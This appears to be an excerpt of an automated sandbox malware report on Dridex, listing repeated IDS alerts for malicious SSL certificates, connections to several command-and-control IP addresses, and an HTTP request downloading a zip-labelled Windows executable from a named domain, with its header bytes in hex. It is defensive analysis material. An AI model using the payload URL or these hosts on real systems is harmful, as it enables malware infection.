Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49259
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49259
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49261
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49262
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49263
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49263
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49265
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49266
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49267
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49267
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49269
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49270
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49271
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49271
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49273
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49274
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49275
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49275
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49277
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49278
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49279
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49279
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49281
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49282
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49283
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49283
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49285
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49286
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49287
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49287
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49289
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49290
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49291
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49291
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49293
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49294
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49295
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49295
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49297
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49298
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49299
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49299
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49301
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49302
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49305
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49306
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49307
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49307
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49309
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49310
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49311
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49311
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49314
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49317
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49318
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49319
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49319
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49321
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49322
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49323
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49323
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49325
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49326
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49327
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49327
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49329
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49330
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49331
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49331
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49333
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49334
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49335
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49335
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49337
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49338
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49339
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49339
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49341
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49342
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49343
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49343
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49345
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49346
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49347
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49347
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49349
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49350
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49351
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49351
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49353
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49354
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49355
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49355
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49357
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49358
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49359
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49359
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49361
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49362
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49363
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49363
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49365
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49366
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49367
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49367
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49369
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49370
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49371
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49371
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49373
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49374
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49375
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49375
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49377
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49378
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49379
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49379
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49381
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49382
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49383
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49383
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49385
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49386
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49387
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49387
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49389
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49390
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49391
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49391
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49393
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49394
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49395
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49395
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49397
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49398
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 80.86.91.27:3308
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.100.228.233:3389
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 46.105.131.65:1512
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 11 Jan 2021 19:47:36 GMTserver: Apachelast-modified: Mon, 11 Jan 2021 08:08:04 GMTaccept-ranges: bytescontent-length: 318976content-type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 c1 97 fc 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 7a 04 00 00 60 00 00 00 00 00 00 d0 26 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 82 00 00 8c 00 00 00 00 00 05 00 7c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 86 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 24 00 00 00 10 00 00 00 26 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 40 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 33 00 d8 03 00 00 00 50 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 60 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 46 00 00 00 00 70 00 00 00 02 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 1b 00 00 00 80 00 00 00 1c 00 00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 cc 52 04 00 00 a0 00 00 00 54 04 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 7c 2e 00 00 00 00 05 00 00 30 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 09 00 00 00 30 05 00 00 0a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: Joe Sandbox ViewIP Address: 5.100.228.233 5.100.228.233
Source: Joe Sandbox ViewIP Address: 80.86.91.27 80.86.91.27
Source: Joe Sandbox ViewIP Address: 46.105.131.65 46.105.131.65
Source: Joe Sandbox ViewIP Address: 77.220.64.37 77.220.64.37
Source: Joe Sandbox ViewASN Name: SENTIANL SENTIANL
Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewJA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: global trafficHTTP traffic detected: GET /k04qkvqu.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wexfashion.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
